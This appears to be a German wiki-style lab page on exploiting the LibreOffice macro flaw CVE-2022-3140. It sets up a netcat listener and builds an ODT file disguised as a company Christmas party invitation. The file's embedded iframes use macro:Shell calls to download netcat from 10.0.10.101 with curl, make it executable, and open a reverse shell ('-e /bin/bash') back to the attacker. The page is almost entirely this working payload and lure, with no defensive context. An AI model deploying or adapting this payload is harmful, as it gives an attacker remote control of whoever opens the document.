LibreOffice Makrolücke Hack (CVE-2022-3140)
Zur Navigation springen
Zur Suche springen
Vorbereitung
- Vorausetzung
- Libre Office version vor 7.3.6
Angreifer
- netcat -lp 1234
ODT erstellen
- cat weihnachtsfeier.odt
- Als embedded HTML
<HTML> <MAIN> Liebes Team,</br> die Müller GmbH lädt Sie herzlich zur Weihnachtsfeier am 27. November im Restaurant Bella Italia ein! </br> Anschließend möchten wir den Abend in der Weinbar am Marktplatz ausklingen lassen.</br> Treffpunkt ist um 17:30 Uhr vor dem Restaurant.</br> </br> </br> Bitte geben Sie uns bis zum 27. November Bescheid, ob wir mit Ihrem Kommen rechnen können.</br> </br> Wir freuen uns auf Sie!</br> </br> Ihre Geschäftsführung</br> </br> <img src="http://10.0.10.101/weihnachtsmann.jpg" "height="100" width="200"> </br> <iframe src='macro:Shell("curl" , 0 ,"http://10.0.10.101/nc -o /tmp/nc",True)'></iframe> </br> <iframe src='macro:Shell("chmod", 0, "755 /tmp/nc" , True )'></iframe> </br> <iframe src='macro:Shell("/tmp/nc", 0, "-e /bin/bash 10.0.10.101 1234", True)'></iframe> </MAIN> </HTML>